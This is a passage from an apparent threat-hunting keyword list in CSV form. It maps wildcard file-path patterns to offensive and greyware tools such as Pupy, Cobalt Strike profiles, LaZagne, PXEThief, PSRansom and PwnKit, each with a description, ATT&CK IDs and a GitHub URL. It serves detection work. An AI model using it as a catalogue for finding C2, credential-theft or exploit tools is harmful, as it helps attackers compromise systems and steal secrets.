TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,1,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*/pspy64*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,1,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*/PSRansom -*,offensive_tool_keyword,PSRansom,PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.,T1486 - T1107 - T1566.001,TA0011 - TA0010,N/A,N/A,Ransomware,https://github.com/JoelGMSec/PSRansom,1,0,N/A,N/A,4,371,95,2022-09-29T09:54:34Z,2022-02-27T11:52:03Z -*/psscanner.go*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*/PSSW100AVB*,offensive_tool_keyword,PSSW100AVB,This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio,T1548 T1562 T1027,N/A,N/A,N/A,Defense Evasion,https://github.com/tihanyin/PSSW100AVB,1,1,N/A,N/A,10,983,166,2022-06-18T16:52:38Z,2021-10-08T17:36:24Z -*/pswRecovery4Moz.txt*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*/ptunnel-ng*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*/puckiestyle/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/puckiestyle/CVE-2022-0847,1,1,N/A,N/A,1,1,1,2022-03-10T08:10:40Z,2022-03-08T14:46:21Z -*/puppet-naivesigning.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/pupwinutils/*.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pupy/*.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pupy/commands/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pupy/memimporter/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pupy/output/pupyx64*.exe*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pupy/pupygen.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pupy_load.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/PupyCmd.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/PupyCompile.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pupygen.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pupylib/payloads/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/PupyOffload.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pupyps.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/PupyServer.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/PupyService.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pupysh.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/PupyTriggers.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/PupyWeb.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/putter.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/PwnDB.py*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*/pwndrop.git*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,1,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*/pwndrop.ini*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*/Pwned.as*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/PwnKit-Exploit*,offensive_tool_keyword,POC,exploitation of CVE-2021-4034,T1210,N/A,N/A,N/A,Exploitation tools,https://github.com/luijait/PwnKit-Exploit,1,1,N/A,N/A,1,79,14,2022-02-07T15:42:00Z,2022-01-26T18:01:26Z -*/pxesploit/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/PXEThief*,offensive_tool_keyword,pxethief,PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager,T1555.004 - T1555.002,TA0006,N/A,N/A,Credential Access,https://github.com/MWR-CyberSec/PXEThief,1,1,N/A,N/A,3,220,27,2023-05-18T19:55:17Z,2022-08-12T22:16:46Z -*/pxexploit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/py_oneliner.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/py2exe/*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*/pyasn1/*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*/pycobalt-*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*/pycobalt/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*/PyExec.git*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,1,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z -*/pyinstaller/*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*/pykiller/CVE-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/pykiller/CVE-2022-23131,1,1,N/A,N/A,1,0,0,2022-02-24T11:59:48Z,2022-02-24T11:34:27Z 